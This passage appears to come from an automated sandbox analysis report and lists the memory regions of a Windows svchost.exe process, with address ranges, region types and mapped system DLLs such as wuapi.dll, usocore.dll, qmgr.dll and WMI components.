"\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1073 start_va = 0x51e8100000 end_va = 0x51e8100fff entry_point = 0x51e8100000 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1074 start_va = 0x51e8110000 end_va = 0x51e820ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8110000" filename = "" Region: id = 1075 start_va = 0x51e8210000 end_va = 0x51e821ffff entry_point = 0x51e8210000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1076 start_va = 0x51e8220000 end_va = 0x51e8222fff entry_point = 0x51e8220000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1077 start_va = 0x51e8290000 end_va = 0x51e838ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8290000" filename = "" Region: id = 1078 start_va = 0x51e8390000 end_va = 0x51e848ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8390000" filename = "" Region: id = 1079 start_va = 0x51e8490000 end_va = 0x51e850ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8490000" filename = "" Region: id = 1080 start_va = 0x51e8600000 end_va = 0x51e8606fff entry_point = 0x0 region_type = private name = "private_0x00000051e8600000" filename = "" Region: id = 1081 start_va = 0x51e8630000 end_va = 0x51e8636fff entry_point = 0x0 region_type = private name = "private_0x00000051e8630000" filename = "" Region: id = 1082 start_va = 0x51e8700000 end_va = 0x51e87fffff entry_point = 0x0 region_type = private name = "private_0x00000051e8700000" filename = "" Region: id = 1083 start_va = 0x51e8800000 end_va = 0x51e88fffff entry_point = 0x0 region_type = private name = "private_0x00000051e8800000" filename = "" Region: id = 1084 start_va = 0x51e8900000 end_va = 0x51e89fffff entry_point = 0x0 region_type = private name = "private_0x00000051e8900000" filename = "" Region: id = 1085 start_va = 0x51e8a80000 end_va = 0x51e8b7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8a80000" filename = "" Region: id = 1086 start_va = 0x51e8c00000 end_va = 0x51e8c7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8c00000" filename = "" Region: id = 1087 start_va = 0x51e8c80000 end_va = 0x51e8d7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8c80000" filename = "" Region: id = 1088 start_va = 0x51e8e00000 end_va = 0x51e8e7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8e00000" filename = "" Region: id = 1089 start_va = 0x51e8f00000 end_va = 0x51e8ffffff entry_point = 0x0 region_type = private name = "private_0x00000051e8f00000" filename = "" Region: id = 1090 start_va = 0x51e9000000 end_va = 0x51e90fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9000000" filename = "" Region: id = 1091 start_va = 0x51e9100000 end_va = 0x51e917ffff entry_point = 0x0 region_type = private name = "private_0x00000051e9100000" filename = "" Region: id = 1092 start_va = 0x51e9180000 end_va = 0x51e91fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9180000" filename = "" Region: id = 1093 start_va = 0x51e9200000 end_va = 0x51e92fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9200000" filename = "" Region: id = 1094 start_va = 0x51e9300000 end_va = 0x51e93fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9300000" filename = "" Region: id = 1095 start_va = 0x51e9400000 end_va = 0x51e94fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9400000" filename = "" Region: id = 1096 start_va = 0x51e9500000 end_va = 0x51e95fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9500000" filename = "" Region: id = 1097 start_va = 0x51e9600000 end_va = 0x51e96fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9600000" filename = "" Region: id = 1098 start_va = 0x51e9700000 end_va = 0x51e97fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9700000" filename = "" Region: id = 1099 start_va = 0x51e9800000 end_va = 0x51e98fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9800000" filename = "" Region: id = 1100 start_va = 0x51e9900000 end_va = 0x51e99fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9900000" filename = "" Region: id = 1101 start_va = 0x51e9a00000 end_va = 0x51e9afffff entry_point = 0x0 region_type = private name = "private_0x00000051e9a00000" filename = "" Region: id = 1102 start_va = 0x51e9b00000 end_va = 0x51e9bfffff entry_point = 0x0 region_type = private name = "private_0x00000051e9b00000" filename = "" Region: id = 1103 start_va = 0x51e9c00000 end_va = 0x51e9cfffff entry_point = 0x0 region_type = private name = "private_0x00000051e9c00000" filename = "" Region: id = 1104 start_va = 0x51e9d00000 end_va = 0x51e9dfffff entry_point = 0x0 region_type = private name = "private_0x00000051e9d00000" filename = "" Region: id = 1105 start_va = 0x51e9e00000 end_va = 0x51e9efffff entry_point = 0x0 region_type = private name = "private_0x00000051e9e00000" filename = "" Region: id = 1106 start_va = 0x51e9f00000 end_va = 0x51e9fdefff entry_point = 0x51e9f00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1107 start_va = 0x51e9fe0000 end_va = 0x51ea0dffff entry_point = 0x0 region_type = private name = "private_0x00000051e9fe0000" filename = "" Region: id = 1108 start_va = 0x51ea0e0000 end_va = 0x51ea15ffff entry_point = 0x0 region_type = private name = "private_0x00000051ea0e0000" filename = "" Region: id = 1109 start_va = 0x51ea170000 end_va = 0x51ea176fff entry_point = 0x0 region_type = private name = "private_0x00000051ea170000" filename = "" Region: id = 1110 start_va = 0x51ea180000 end_va = 0x51ea27ffff entry_point = 0x0 region_type = private name = "private_0x00000051ea180000" filename = "" Region: id = 1111 start_va = 0x51ea300000 end_va = 0x51ea3fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea300000" filename = "" Region: id = 1112 start_va = 0x51ea400000 end_va = 0x51ea4fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea400000" filename = "" Region: id = 1113 start_va = 0x51ea500000 end_va = 0x51ea5fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea500000" filename = "" Region: id = 1114 start_va = 0x51ea600000 end_va = 0x51ea6fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea600000" filename = "" Region: id = 1115 start_va = 0x51ea700000 end_va = 0x51ea7fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea700000" filename = "" Region: id = 1116 start_va = 0x51ea800000 end_va = 0x51ea8fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea800000" filename = "" Region: id = 1117 start_va = 0x51ea900000 end_va = 0x51ea9fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea900000" filename = "" Region: id = 1118 start_va = 0x51eaa00000 end_va = 0x51eaafffff entry_point = 0x0 region_type = private name = "private_0x00000051eaa00000" filename = "" Region: id = 1119 start_va = 0x51eab00000 end_va = 0x51eabfffff entry_point = 0x0 region_type = private name = "private_0x00000051eab00000" filename = "" Region: id = 1120 start_va = 0x51eac00000 end_va = 0x51eacfffff entry_point = 0x0 region_type = private name = "private_0x00000051eac00000" filename = "" Region: id = 1121 start_va = 0x51ead00000 end_va = 0x51eadfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051ead00000" filename = "" Region: id = 1122 start_va = 0x51eae00000 end_va = 0x51eaefffff entry_point = 0x0 region_type = private name = "private_0x00000051eae00000" filename = "" Region: id = 1123 start_va = 0x51eaf00000 end_va = 0x51eaffffff entry_point = 0x0 region_type = private name = "private_0x00000051eaf00000" filename = "" Region: id = 1124 start_va = 0x51eb000000 end_va = 0x51eb0fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb000000" filename = "" Region: id = 1125 start_va = 0x51eb1d0000 end_va = 0x51eb1d6fff entry_point = 0x0 region_type = private name = "private_0x00000051eb1d0000" filename = "" Region: id = 1126 start_va = 0x51eb1e0000 end_va = 0x51eb2dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb1e0000" filename = "" Region: id = 1127 start_va = 0x51eb2e0000 end_va = 0x51eb3dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb2e0000" filename = "" Region: id = 1128 start_va = 0x51eb3e0000 end_va = 0x51eb4dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb3e0000" filename = "" Region: id = 1129 start_va = 0x51eb4e0000 end_va = 0x51eb5dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb4e0000" filename = "" Region: id = 1130 start_va = 0x51eb5e0000 end_va = 0x51eb6dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb5e0000" filename = "" Region: id = 1131 start_va = 0x51eb6e0000 end_va = 0x51eb7dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb6e0000" filename = "" Region: id = 1132 start_va = 0x51eb7e0000 end_va = 0x51eb8dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb7e0000" filename = "" Region: id = 1133 start_va = 0x51eb8e0000 end_va = 0x51eb9dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb8e0000" filename = "" Region: id = 1134 start_va = 0x51eb9e0000 end_va = 0x51ebadffff entry_point = 0x0 region_type = private name = "private_0x00000051eb9e0000" filename = "" Region: id = 1135 start_va = 0x7df5ffdb0000 end_va = 0x7ff5ffdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdb0000" filename = "" Region: id = 1136 start_va = 0x7ff7b3ab0000 end_va = 0x7ff7b3ab1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab0000" filename = "" Region: id = 1137 start_va = 0x7ff7b3ab2000 end_va = 0x7ff7b3ab3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab2000" filename = "" Region: id = 1138 start_va = 0x7ff7b3ab4000 end_va = 0x7ff7b3ab5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab4000" filename = "" Region: id = 1139 start_va = 0x7ff7b3ab6000 end_va = 0x7ff7b3ab7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab6000" filename = "" Region: id = 1140 start_va = 0x7ff7b3ab8000 end_va = 0x7ff7b3ab9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab8000" filename = "" Region: id = 1141 start_va = 0x7ff7b3aba000 end_va = 0x7ff7b3abbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aba000" filename = "" Region: id = 1142 start_va = 0x7ff7b3abc000 end_va = 0x7ff7b3abdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3abc000" filename = "" Region: id = 1143 start_va = 0x7ff7b3abe000 end_va = 0x7ff7b3abffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3abe000" filename = "" Region: id = 1144 start_va = 0x7ff7b3ac0000 end_va = 0x7ff7b3ac1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac0000" filename = "" Region: id = 1145 start_va = 0x7ff7b3ac2000 end_va = 0x7ff7b3ac3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac2000" filename = "" Region: id = 1146 start_va = 0x7ff7b3ac4000 end_va = 0x7ff7b3ac5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac4000" filename = "" Region: id = 1147 start_va = 0x7ff7b3ac6000 end_va = 0x7ff7b3ac7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac6000" filename = "" Region: id = 1148 start_va = 0x7ff7b3ac8000 end_va = 0x7ff7b3ac9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac8000" filename = "" Region: id = 1149 start_va = 0x7ff7b3aca000 end_va = 0x7ff7b3acbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aca000" filename = "" Region: id = 1150 start_va = 0x7ff7b3acc000 end_va = 0x7ff7b3acdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3acc000" filename = "" Region: id = 1151 start_va = 0x7ff7b3ace000 end_va = 0x7ff7b3acffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ace000" filename = "" Region: id = 1152 start_va = 0x7ff7b3ad0000 end_va = 0x7ff7b3ad1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad0000" filename = "" Region: id = 1153 start_va = 0x7ff7b3ad2000 end_va = 0x7ff7b3ad3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad2000" filename = "" Region: id = 1154 start_va = 0x7ff7b3ad4000 end_va = 0x7ff7b3ad5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad4000" filename = "" Region: id = 1155 start_va = 0x7ff7b3ad6000 end_va = 0x7ff7b3ad7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad6000" filename = "" Region: id = 1156 start_va = 0x7ff7b3ad8000 end_va = 0x7ff7b3ad9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad8000" filename = "" Region: id = 1157 start_va = 0x7ff7b3ada000 end_va = 0x7ff7b3adbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ada000" filename = "" Region: id = 1158 start_va = 0x7ff7b3adc000 end_va = 0x7ff7b3addfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3adc000" filename = "" Region: id = 1159 start_va = 0x7ff7b3ade000 end_va = 0x7ff7b3adffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ade000" filename = "" Region: id = 1160 start_va = 0x7ff7b3ae0000 end_va = 0x7ff7b3ae1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae0000" filename = "" Region: id = 1161 start_va = 0x7ff7b3ae2000 end_va = 0x7ff7b3ae3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae2000" filename = "" Region: id = 1162 start_va = 0x7ff7b3ae4000 end_va = 0x7ff7b3ae5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae4000" filename = "" Region: id = 1163 start_va = 0x7ff7b3ae6000 end_va = 0x7ff7b3ae7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae6000" filename = "" Region: id = 1164 start_va = 0x7ff7b3ae8000 end_va = 0x7ff7b3ae9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae8000" filename = "" Region: id = 1165 start_va = 0x7ff7b3aea000 end_va = 0x7ff7b3aebfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aea000" filename = "" Region: id = 1166 start_va = 0x7ff7b3aec000 end_va = 0x7ff7b3aedfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aec000" filename = "" Region: id = 1167 start_va = 0x7ff7b3aee000 end_va = 0x7ff7b3aeffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aee000" filename = "" Region: id = 1168 start_va = 0x7ff7b3af0000 end_va = 0x7ff7b3af1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af0000" filename = "" Region: id = 1169 start_va = 0x7ff7b3af2000 end_va = 0x7ff7b3af3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af2000" filename = "" Region: id = 1170 start_va = 0x7ff7b3af4000 end_va = 0x7ff7b3af5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af4000" filename = "" Region: id = 1171 start_va = 0x7ff7b3af6000 end_va = 0x7ff7b3af7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af6000" filename = "" Region: id = 1172 start_va = 0x7ff7b3af8000 end_va = 0x7ff7b3af9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af8000" filename = "" Region: id = 1173 start_va = 0x7ff7b3afa000 end_va = 0x7ff7b3afbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3afa000" filename = "" Region: id = 1174 start_va = 0x7ff7b3afc000 end_va = 0x7ff7b3afdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3afc000" filename = "" Region: id = 1175 start_va = 0x7ff7b3afe000 end_va = 0x7ff7b3afffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3afe000" filename = "" Region: id = 1176 start_va = 0x7ff7b3b00000 end_va = 0x7ff7b3b01fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b00000" filename = "" Region: id = 1177 start_va = 0x7ff7b3b02000 end_va = 0x7ff7b3b03fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b02000" filename = "" Region: id = 1178 start_va = 0x7ff7b3b04000 end_va = 0x7ff7b3b05fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b04000" filename = "" Region: id = 1179 start_va = 0x7ff7b3b06000 end_va = 0x7ff7b3b07fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b06000" filename = "" Region: id = 1180 start_va = 0x7ff7b3b08000 end_va = 0x7ff7b3b09fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b08000" filename = "" Region: id = 1181 start_va = 0x7ff7b3b0a000 end_va = 0x7ff7b3b0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b0a000" filename = "" Region: id = 1182 start_va = 0x7ff7b3b0c000 end_va = 0x7ff7b3b0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b0c000" filename = "" Region: id = 1183 start_va = 0x7ff7b3b0e000 end_va = 0x7ff7b3b0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b0e000" filename = "" Region: id = 1184 start_va = 0x7ff7b3b10000 end_va = 0x7ff7b3b11fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b10000" filename = "" Region: id = 1185 start_va = 0x7ff7b3b12000 end_va = 0x7ff7b3b13fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b12000" filename = "" Region: id = 1186 start_va = 0x7ff7b3b14000 end_va = 0x7ff7b3b15fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b14000" filename = "" Region: id = 1187 start_va = 0x7ff7b3b16000 end_va = 0x7ff7b3b17fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b16000" filename = "" Region: id = 1188 start_va = 0x7ff7b3b18000 end_va = 0x7ff7b3b19fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b18000" filename = "" Region: id = 1189 start_va = 0x7ff7b3b1a000 end_va = 0x7ff7b3b1bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b1a000" filename = "" Region: id = 1190 start_va = 0x7ff7b3b1c000 end_va = 0x7ff7b3b1dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b1c000" filename = "" Region: id = 1191 start_va = 0x7ff7b3b1e000 end_va = 0x7ff7b3b1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b1e000" filename = "" Region: id = 1192 start_va = 0x7ff7b3b20000 end_va = 0x7ff7b3b21fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b20000" filename = "" Region: id = 1193 start_va = 0x7ff7b3b22000 end_va = 0x7ff7b3b23fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b22000" filename = "" Region: id = 1194 start_va = 0x7ff7b3b24000 end_va = 0x7ff7b3b25fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b24000" filename = "" Region: id = 1195 start_va = 0x7ff7b3b26000 end_va = 0x7ff7b3b27fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b26000" filename = "" Region: id = 1196 start_va = 0x7ff7b3b28000 end_va = 0x7ff7b3b29fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b28000" filename = "" Region: id = 1197 start_va = 0x7ff7b3b2a000 end_va = 0x7ff7b3b2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b2a000" filename = "" Region: id = 1198 start_va = 0x7ff7b3b2c000 end_va = 0x7ff7b3b2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b2c000" filename = "" Region: id = 1199 start_va = 0x7ff7b3b2e000 end_va = 0x7ff7b3b2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b2e000" filename = "" Region: id = 1200 start_va = 0x7ff7b3b30000 end_va = 0x7ff7b3c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3b30000" filename = "" Region: id = 1201 start_va = 0x7ff7b3c30000 end_va = 0x7ff7b3c52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3c30000" filename = "" Region: id = 1202 start_va = 0x7ff7b3c53000 end_va = 0x7ff7b3c54fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c53000" filename = "" Region: id = 1203 start_va = 0x7ff7b3c55000 end_va = 0x7ff7b3c56fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c55000" filename = "" Region: id = 1204 start_va = 0x7ff7b3c57000 end_va = 0x7ff7b3c58fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c57000" filename = "" Region: id = 1205 start_va = 0x7ff7b3c59000 end_va = 0x7ff7b3c59fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c59000" filename = "" Region: id = 1206 start_va = 0x7ff7b3c5a000 end_va = 0x7ff7b3c5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5a000" filename = "" Region: id = 1207 start_va = 0x7ff7b3c5c000 end_va = 0x7ff7b3c5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5c000" filename = "" Region: id = 1208 start_va = 0x7ff7b3c5e000 end_va = 0x7ff7b3c5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5e000" filename = "" Region: id = 1209 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1210 start_va = 0x7ffbed390000 end_va = 0x7ffbed453fff entry_point = 0x7ffbed390000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1211 start_va = 0x7ffbed460000 end_va = 0x7ffbed478fff entry_point = 0x7ffbed460000 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1212 start_va = 0x7ffbed480000 end_va = 0x7ffbed4bffff entry_point = 0x7ffbed480000 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1213 start_va = 0x7ffbed4c0000 end_va = 0x7ffbed4d6fff entry_point = 0x7ffbed4c0000 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1214 start_va = 0x7ffbed4e0000 end_va = 0x7ffbed539fff entry_point = 0x7ffbed4e0000 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1215 start_va = 0x7ffbf2590000 end_va = 0x7ffbf25a1fff entry_point = 0x7ffbf2590000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1216 start_va = 0x7ffbf25b0000 end_va = 0x7ffbf262ffff entry_point = 0x7ffbf25b0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1217 start_va = 0x7ffbf2bb0000 end_va = 0x7ffbf2bccfff entry_point = 0x7ffbf2bb0000 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1218 start_va = 0x7ffbf2cc0000 end_va = 0x7ffbf2d25fff entry_point = 0x7ffbf2cc0000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1219 start_va = 0x7ffbf2d30000 end_va = 0x7ffbf2d42fff entry_point = 0x7ffbf2d30000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1220 start_va = 0x7ffbf2d50000 end_va = 0x7ffbf2d5afff entry_point = 0x7ffbf2d50000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1221 start_va = 0x7ffbf2d60000 end_va = 0x7ffbf2e80fff entry_point = 0x7ffbf2d60000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1222 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1223 start_va = 0x7ffbf5c50000 end_va = 0x7ffbf5ef6fff entry_point = 0x7ffbf5c50000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1224 start_va = 0x7ffbf5f00000 end_va = 0x7ffbf5f10fff entry_point = 0x7ffbf5f00000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1225 start_va = 0x7ffbf5f20000 end_va = 0x7ffbf5fa2fff entry_point = 0x7ffbf5f20000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1226 start_va = 0x7ffbf5fb0000 end_va = 0x7ffbf5fc5fff entry_point = 0x7ffbf5fb0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1227 start_va = 0x7ffbf5fd0000 end_va = 0x7ffbf60a7fff entry_point = 0x7ffbf5fd0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1228 start_va = 0x7ffbf60b0000 end_va = 0x7ffbf6112fff entry_point = 0x7ffbf60b0000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1229 start_va = 0x7ffbf6120000 end_va = 0x7ffbf6144fff entry_point = 0x7ffbf6120000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1230 start_va = 0x7ffbf6150000 end_va = 0x7ffbf6163fff entry_point = 0x7ffbf6150000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1231 start_va = 0x7ffbf6170000 end_va = 0x7ffbf6267fff entry_point = 0x7ffbf6170000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1232 start_va = 0x7ffbf6270000 end_va = 0x7ffbf62e2fff entry_point = 0x7ffbf6270000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1233 start_va = 0x7ffbf62f0000 end_va = 0x7ffbf6426fff entry_point = 0x7ffbf62f0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1234 start_va = 0x7ffbf6430000 end_va = 0x7ffbf64c6fff entry_point = 0x7ffbf6430000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 1235 start_va = 0x7ffbf64d0000 end_va = 0x7ffbf64e0fff entry_point = 0x7ffbf64d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1236 start_va = 0x7ffbf64f0000 end_va = 0x7ffbf6500fff entry_point = 0x7ffbf64f0000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1237 start_va = 0x7ffbf6510000 end_va = 0x7ffbf658ffff entry_point = 0x7ffbf6510000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1238 start_va = 0x7ffbf6590000 end_va = 0x7ffbf65a4fff entry_point = 0x7ffbf6590000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1239 start_va = 0x7ffbf65b0000 end_va = 0x7ffbf65c9fff entry_point = 0x7ffbf65b0000 region_type = 